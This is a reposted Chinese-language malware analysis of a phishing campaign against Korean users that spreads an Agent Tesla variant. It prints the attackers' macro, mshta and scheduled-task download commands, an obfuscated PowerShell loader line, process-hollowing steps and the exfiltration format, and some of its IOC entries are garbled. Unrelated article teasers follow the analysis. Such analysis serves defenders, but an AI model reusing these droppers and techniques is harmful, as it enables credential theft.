sponsored links

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

Fortinet FortiGuard 實驗室近期發現了針對韓國發起攻擊的網路釣魚攻擊,郵件使用韓文書寫並要求收件人開啟附件中的 PowerPoint 檔案以檢視採購訂單,該惡意PowerPoint 檔案會傳播 Agent Tesla 的新變種。

自從 2014 年 Agent Tesla 被發現以來一直非常活躍,多個變種層出不窮。Agent Tesla 是一個 .Net 編寫的惡意軟體,主要用於從失陷主機上竊取敏感資訊,如剪貼簿資料、鍵盤按鍵記錄、軟體憑據(瀏覽器、郵件、VPN、FTP、即時通訊軟體等)、螢幕截圖等。

釣魚郵件

郵件中的韓文試圖引誘收件人開啟附件以確認採購訂單。

釣魚郵件

惡意 PowerPoint

PowerPoint 檔案中包含一個名為 Auto_Open() 的宏程式碼,在開啟檔案時就呼叫該函式。

VBA 程式碼如下所示:

Sub Auto_Open()

p_ = soraj.bear.GroupName

Shell p_

End Sub

soraj 是一個 UserForm 控制元件的名字,而bear 是 soraj 內的 CheckBox 控制元件的名稱。攻擊者呼叫 Shell 執行從 bear 控制元件的 GroupName 屬性中讀取的命令。

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

CheckBox 內容

如上所示,soraj.bear.GroupName 的值為 mshta hxxp[:]//bitly[.]com/gdhamksgdsadj。

命令由 mshta 和一個 URL 組成。mshta 可用於執行 HTML 應用程式檔案以及 VBScript 指令碼等,開啟該 URL 後會被重定向到其他 URL(hxxps[:]//onedayiwillloveyouforever[.]blogspot.com/p/divine111.html)。響應中包含一段 VBScript 程式碼,用於將轉義的程式碼寫入由 mshta.exe 執行的當前 HTML 檔案。

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

請求互動

如上所示,響應資料中可以看到 URL 重定向和轉義的 VBScript 程式碼。

這種 VBScript 程式碼被稱為 VBScript-embedded-in-HTML,部分未轉義程式碼如下所示:

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

部分 VBScript 程式碼

指令碼檔案

攻擊者在傳播 Agent Tesla 的過程中使用了多種指令碼,包括 VBScript-embedded-in-HTML、VBScript 和 PowerShell 等用於各種用途。

升級

惡意軟體會每兩個小時請求一次新版本,並在失陷主機上執行。為此,VBScript-embedded-in-HTML 執行命令將其新增到計劃任務中。建立執行計劃的命令如下所示:

args = "/create /sc MINUTE /mo 120 /tn """"update-Yendex """" /F /tr """"\""""MsHtA""""\""""hxxps://madarbloghogya.blogspot.com/p/divineback222.html""""

Set Somosa = GetObject("new:13709620-C279-11CE-A49E-444553540000")

'schtasks 'open

Somosa Shellexecute StrReverse("sksathcs"), args, "", StrReverse("nepo"), 0

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

定時任務持久化

在遠端 HTML 檔案中執行 VBScript 程式碼,會下載 Agent Tesla 到失陷主機,檢測並終止正在執行的 Agent Tesla 程序,以進行升級。

持久化

從 VBScript-embedded-in-HTML 中提取的獨立 VBS 檔案 %Public%\hulalalMCROSOFT.vbs 會從 hxxps[:]//bitbucket[.]org/!api/2.0/ 下載另一個 base64 編碼的 VBS 程式碼片段 /hogya/5X7My8/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb/files/divine1-2 到本地。透過 base64 解碼後,VBS 程式碼將會被儲存到位於 %Public% 資料夾下的 UYA-update.vbs 檔案中。

這個 VBS 程式碼片段會下載 Agent Tesla 並在失陷主機上執行。無論何時執行該 VBS 檔案,都會啟動 Agent Tesla。

為了維持持久化,Agent Tesla 會將 UYA-update.vbs 檔案複製到 Startup 資料夾中並重命名為 GTQ.vbs,這能夠使其在系統啟動時自啟動。

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

VBS 指令碼檔案

Process Hollowing

UYA-update.vbs 根據本地變數在 base64 解碼出的 PE 檔案中提取 PowerShell 程式碼,再呼叫 PowerShell.exe 執行。PE 檔案是一個 .NET 程式,其中包含一個屬於 ClassLibrary3.Class1 類、名為 Run() 的函式。

呼叫函式的 PowerShell 程式碼,如下所示:

[System.AppDomain]::CurrentDomain.Load($fuUN).GetType('ClassLibrary3.Class1').GetMethod( 'Run' ).Invoke($null, [object[]] ('1-1enivid/selif/c4ab4d371cd40ce3303b4d33c868122f7cfd /do8qxn/aygoh/steppins/0.2/ipa!/gro.tekcubtib//:sptth'))

$fuUN 從解碼的 .NET 檔案中呼叫 GetType() 和 GetMethod() 來獲取函式 ClassLibrary3.Class1.Run() 並透過 Invoke() 呼叫 Run() 函式,執行的引數是一個 URL,具體為 hxxps[:]//bitbucket[.]org/!api/2.0/snippets/hogya/nxq8od/c73df176f221868c33d4b3033ec04dc173d4ba4c/files/divine1-1。

函式 ClassLibrary3.Class1.Run() 的完整程式碼如下所示:

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

.NET 函式程式碼

呼叫函式 ClassLibrary3.Class1.Run() 後,透過連結下載 hxxp[:]//149.56.200.165/rump/1.txt(執行 Process Hollowing 的 .NET 模組)和 hxxps[:]//bitbucket[.]org/!api/2.0/snippets/hogya/nxq8od/c73df176f221868c33d4b3033ec04dc173d4ba4c/files/divine1-1(Agent Tesla)。

Agent Tesla 在失陷主機上採用無檔案執行,只存在於 PowerShell 程序的記憶體中。另一個 .NET 模組負責執行 Process Hollowing 的函式為 ClassLibrary1.Class1.Run(),並且針對 RegAsm.exe 執行 Agent Tesla。

RegAsm.exe 是 Microsoft .Net Framework 的官方元件,攻擊者將惡意軟體注入其中規避檢測。

.NET 模組中呼叫了許多 Windows API 函式將 Agent Tesla 注入目標程序。

透過帶有 CREATE_SUSPENDED 標誌的 CreateProcess() 建立掛起的exe 程序

透過 VirtualAllocEx()、NtUnmapViewOfSection()、ReadProcessMemory()、WriteProcessMemory() 將 Agent Tesla 注入掛起的exe 程序新分配的記憶體中

透過 SetThreadContext()/Wow64SetThreadContext()、GetThreadContext()/Wow64GetThreadContext() 修改exe 的登錄檔並修改 EIP 指標指向 Agent Tesla

透過 ResumeThread() 恢復執行exe 程序

Agent Tesla 執行後就會竊取受害者的私密資訊。

Agent Tesla

Agent Tesla 對外發布了 Setup 程式,可以根據攻擊者啟用的功能編譯 Agent Tesla 程式。

Agent Tesla 可以透過 Main()(憑據竊取)、Timer(竊取剪貼簿、螢幕截圖等)和 Thread(透過瀏覽器竊取 Cookie)等函式啟動需要執行的功能。

捕獲的 Agent Tesla 變種只啟用了憑據竊取與 Cookie 竊取功能,支援的客戶端超過 70 個,如下所示:

基於 Chromium 的 Web 瀏覽器:Epic Privacy, Uran, Chedot, Comodo Dragon, Chromium, Orbitum, Cool Novo, Sputnik, Coowon, Brave, Liebao Browser, Elements Browser, Sleipnir 6, Vivaldi, 360 Browser, Torch Browser, Yandex Browser, QIP Surf, Amigo, Kometa, Citrio, Opera Browser, CentBrowser, 7Star, Coccoc, and Iridium Browser.

網頁瀏覽器:Chrome, Microsoft Edge, Firefox, Safari, IceCat, Waterfox, Tencent QQBrowser, Flock Browser, SeaMonkey, IceDragon, Falkon, UCBrowser, Cyberfox, K-Meleon, PaleMoon.

VPN 客戶端:Open-VPN, Nord-VPN, RealVNC, TightVNC, UltraVNC, Private Internet Access VPN.

FTP 客戶端:FileZilla, Cftp, WS_FTP, FTP Navigator, FlashFXP, SmartFTP, WinSCP 2, CoreFTP, FTPGetter.

郵件客戶端:Outlook, Postbox, Thunderbird, Mailbird, eM Client, Claws-mail, Opera Mail, Foxmail, Qualcomm Eudora, IncrediMail, Pocomail, Becky! Internet Mail, The Bat!.

即時通訊客戶端/下載工具:DownloadManager, jDownloader, Psi+, Trillian.

其他:MySQL and Microsoft Credentials.

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

部分程式碼示意圖

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

竊取資訊示意圖

上圖顯示了剛從 IceCat 程式竊取的憑據,Browser 是客戶端名稱、Password 是儲存的密碼、URL 是登入頁面、UserName 是儲存的使用者名稱。

竊取的憑據儲存在全域性變數中,格式化後回傳給攻擊者。

資料回傳

Agent Tesla 支援四種方式將竊取資料回傳給攻擊者,分別是 FTP、HTTP POST、SMTP、Telegram。

捕獲的變種使用了 HTTP POST 方式。Agent Tesla 首先使用 DES 將資料加密,再利用 base64 編碼後透過 HTTP POST 請求傳送給攻擊者。Agent Tesla 向硬編碼的字串 hxxp[:]//69[.]174.99[.]181/webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php 傳送請求。

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

回傳資料包

如上所示,Agent Tesla 將竊取的資料作為 p= 的值進行傳送。

資料頭中包含失陷主機的基本資訊:“資料包編號”+“分隔符”+“受害者ID”+“分隔符”+“日期和時間”+“分隔符字串”+“使用者名稱/計算機名”+“分隔符”,後續緊跟著被竊取的資訊。

網路釣魚攻擊瞄準韓國,傳播Agent Tesla新變種

回傳資訊格式

如上所示,為一個編號為 6 的資料包示例。分割字串為 0de264895c1ed90486c73c6eb110af6c2222264a0854b0047b9ead88b718f7d0,受害者 ID 是根據系統硬體資訊生成的 MD5 雜湊。

Agent Tesla 共提供了七種資料包進行資料回傳:

0:第一個資料包,通知攻擊者 Agent Tesla 已經成功啟動,只包含資料頭。

1:每隔 120 秒傳送一次的保活心跳資料包,只包含資料頭。

2:每隔 60 秒傳送一次的確認解除安裝資料包,響應中存在解除安裝命令時將會刪除所有相關檔案並且清除登錄檔

3:傳送受害者鍵盤記錄和剪貼簿資料的資料包

4:傳送受害者螢幕截圖的資料包

5:傳送受害者竊取憑據的資料包

6:傳送受害者竊取的 Cookie 的資料包

結論

這次的釣魚攻擊針對韓國使用者展開,攻擊會傳播 Agent Tesla 的一個新變種,並且回傳相關資訊給攻擊者。

IOC

hxxps[:]//onedayiwillloveyouforever[.]blogspot[.]com/p/divine111.html
hxxps[:]//madarbloghogya[.]blogspot[.]com/p/divineback222.html
hxxps[: ]//bitbucket[.]org/!api/2.0/snippets/hogya/5X7My8/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb/files/divine1-2
hxxp[:]//149[.]56.16500
hxxps[:]//bitbucket[.]org/!api/2.0/snippets/hogya/nxq8od/c73df176f221868c33d4b3033ec04dc173d4ba4c/files/divine1-1
hxxp[:]1.//64189[.]/ webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php
AA121762EB34D32C7D831D7ABCEC34F5A4241AF9E669E5CC43A49A071BD6E894
0BBF16E320FB942E4EA09BB9E953076A4620F59E5FFAEFC3A2FFE8B8C2B3389C

參考來源

Fortinet

分類: 娛樂
時間: 2021-12-19

相關文章

有錢人都喜歡玩什麼?
1 2014年,我讀大ー,第一次參加有錢人的私人晚會.那一夜,徹底改變了我的一生. 那場晚會在一幢海邊別墅舉辦,名義上是一個財團公子哥的生日趴體,進場的所有人都不能攜帶手機等電子裝置.我到的時候,別墅 ...

有錢人都選擇貸款買房的理由是什麼?

有錢人都選擇貸款買房的理由是什麼?
前言:廣州作為宜居宜業的一線城市,房價相比其他一線城市友好太多,想買剛需房的朋友努努力還是有機會的,頭疼的都是首付,只要首付攢夠了,貸款買房的月供一般沒問題. 也有-些手拎蛇皮袋.腳夾拖鞋的大爺大媽, ...

在非洲做生意的中國人,為什麼很多都成為了有錢人?

在非洲做生意的中國人,為什麼很多都成為了有錢人?
說到非洲,大家都覺得經濟落後,社會動盪.雖然非洲經濟發展不怎麼樣,但現在越來越多的中國人前往非洲打工和做生意.我在非洲奈及利亞打工五六年,見到了很多中國人在非洲的發家史.很多中國生意人到奈及利亞之後, ...

玩遊戲都能花上億RMB,有錢人的快樂我體會不了

玩遊戲都能花上億RMB,有錢人的快樂我體會不了
現在社會,生活好了,人們的精神生活也豐富了.電子遊戲的出現,大大的改善了人們空虛的生活.而網路遊戲的出現卻是加大在空虛中尋找刺激的人的出現.而這些人為了得到更大的刺激和滿足,充值,就幫他們能快速的實現 ...

告別網紅臉!30年前的素人街拍,每個人都美得非常真實

告別網紅臉!30年前的素人街拍,每個人都美得非常真實
90年代至千禧年間 絕對的流金歲月 當時的年輕人都流行穿什麼? 一起來看看 日 本 90年代的日本年輕人 已經有了獨特屬於日本的風格 不羈自由.跳躍大膽.自然隨性 經典的辦公室小姐姐形象 圓形耳環絕對 ...

哪些農村老物件價值高?估計很多人都想不到,也許你家裡就有

哪些農村老物件價值高?估計很多人都想不到,也許你家裡就有
嗨大家好,我們又見面了,我是你們的老朋友--農民大張.感謝大家一直以來對我的支援和鼓勵,有了你們的支援和鼓勵,我的寫作之路才能走得更長遠,我也才能為大家帶來更多有有的好資訊.老規矩,今天我們繼續來聊聊 ...

刮目相看:每個人都具有可塑性,永遠不要低估自己的潛力和潛能

刮目相看:每個人都具有可塑性,永遠不要低估自己的潛力和潛能
文/唐若 唐若心學原創作品,違者必究 今天和大家分享成語故事叫做刮目相看,這個故事是發生在三國時期.呂蒙是吳國有名的大將軍,因為家裡很窮,沒有辦法讓他念書,所以,常常被人笑說吳國的呂蒙只不過是會打仗而 ...

為什麼越來越多的人從低層搬回高層?有錢人:低層有“三大硬傷”

為什麼越來越多的人從低層搬回高層?有錢人:低層有“三大硬傷”
作者:縱橫君 近年來,有一種觀點認為,高層住宅由於消防原因.設施裝置老化等原因,將越來越受人們嫌棄,甚至有專家說,未來,幾十層的高層住宅價值將一落千丈.所以,他們建議大家應該去買低層住宅,包括別墅.多 ...

在中國有多少錢,算是有錢人了呢?

在中國有多少錢,算是有錢人了呢?
我國幅員遼闊,地域寬廣,不同的地區經濟發展水平不一樣,所以各地的有錢人標準也不一樣,比如在廣闊的西部偏遠地區,擁有200萬元的資金應該可以算得上是富人了:但是在北上廣深等一線城市,200萬元可能只夠付 ...

有錢人正從別墅搬回大平層?過來人指出別墅3大“硬傷”,很現實

有錢人正從別墅搬回大平層?過來人指出別墅3大“硬傷”,很現實
一直以來,很多人都將別墅作為自己買房的最終目標,打算等到自己有錢後,一定要買一套屬於自己的別墅住宅.對於一些高階人士來說,別墅不僅意味著生活居住體驗的差異,更是一種身份的象徵,因此很多人有錢之後都會去 ...

大量有錢人拋棄別墅搬回高層,別墅不香了?“3大缺陷”很真實

大量有錢人拋棄別墅搬回高層,別墅不香了?“3大缺陷”很真實
一談到別墅,在傳統觀念上,一直都是購房大眾的終極夢想,甚至有人直言:只要以後有錢了,高低要弄一套別墅享受享受! 而之所以有這種想法,我認為無非兩個因素導致,首先:別墅一般地處偏遠郊區,依山傍水,環境優 ...

僅一夜!湖人或籤40歲老將,籃網勁敵發聲,名嘴力挺火箭76人1換1

僅一夜!湖人或籤40歲老將,籃網勁敵發聲,名嘴力挺火箭76人1換1
北京時間9月19日,NBA很多球員今天都有與眾不同的表現.湖人新援小喬丹在和詹姆斯的訓練師菲爾-漢迪一起訓練,他想努力提高自己.而另一名湖人新援安東尼則在搞簽名售書,看起來洛杉磯市場確實不錯.森林狼核 ...

有錢人買雷克薩斯ES,沒錢人買豐田亞洲龍,同平臺卻不同"命"

有錢人買雷克薩斯ES,沒錢人買豐田亞洲龍,同平臺卻不同"命"
在國內,憑藉"原汁原味"的進口身份,雷克薩斯ES可以說是成為了很多有錢人購車的首選車型.他們放棄了BBA裡的E級.5系.A6L,為的就是享受所謂豐田工匠精神最極致的體驗.畢竟,很多 ...

大學生的困惑:身邊人都在墮落,我該“同流合汙”嗎?

大學生的困惑:身邊人都在墮落,我該“同流合汙”嗎?
女大學生宿舍四個人,有三個陸續加入了色*情直播行列.出於安全或者其他因素考慮,她們開始威逼利誘,竭力要拉第四個人下水. 在這種情境下,這名女生該何去何從呢? 01 包老師好,我叫小燕,是一名在校大學生 ...

為什麼感覺很多做過生意的人都不願意去上班呢?

為什麼感覺很多做過生意的人都不願意去上班呢?
可以這樣說所有創業的人都明白一個道理:上班解決溫飽尚可,改變人生不可能,對於普通人想賺大錢創業是最好的選項. 我是一個在網際網路打拼十年的創業者,風風雨雨十年,雖然不是一帆風順,但是我得到的是打工永遠 ...

古埃及有錢人住的房子是什麼樣的?

古埃及有錢人住的房子是什麼樣的?
厚著臉皮停更了四個多月,現在來繼續講古埃及人的住房.上次那篇裡我們講到了古埃及人造房子的原材料以及城裡鄉下那些窮人的住房是什麼樣子的,過了這麼久估計你們也都不記得了,不如回頭看看(點選檢視<古埃 ...

姚明對葉莉的真愛:一生只和一個女孩談戀愛,什麼人都不要只要她

姚明對葉莉的真愛:一生只和一個女孩談戀愛,什麼人都不要只要她
有時,一個人的職業,只是因為自身條件非常突出的一點,也許,他還可以有另外的選擇,但先天條件,只允許他接愛一個安排.而且,他在職業上的發展,一開始並不被看好,甚至會被一些權威所否定,但只要在這條路上堅持 ...

秋季登山好處多!但不是所有人都適合這項運動......

秋季登山好處多!但不是所有人都適合這項運動......
秋季氣候舒適,景色宜人 是開展戶外活動的好時候 登山也成為這個季節 人們喜愛的健身方式之一 但如果姿勢不正確 對膝蓋.腿部會造成傷害 那麼,關於登山的那些事兒 一起來看看吧 "登山" ...

到領導家才發現,有錢人的廚房長這樣!高階又大氣,拍給大家瞧瞧

到領導家才發現,有錢人的廚房長這樣!高階又大氣,拍給大家瞧瞧
廚房,是我們每天都會踏入的一方小天地,我們每天都需要在這裡製作美食.因此,擁有一個好用的廚房是非常重要的.但是廚房又油煙重地,而且雜物又多,就會看起來亂糟糟的,讓人頭疼. 上週末到領導家做客,才發現有 ...

侃爺3.7億買下“爛尾樓”,有錢人流行住毛坯房?

侃爺3.7億買下“爛尾樓”,有錢人流行住毛坯房?
簡陋寒酸的"毛坯房" 富豪卻花天價購買 如今的炫富手段 講究的是"越窮越高階" 3.7億的豪宅長什麼樣? 自帶高爾夫球場的超大莊園?金碧輝煌的城堡宮殿?奢華歐式 ...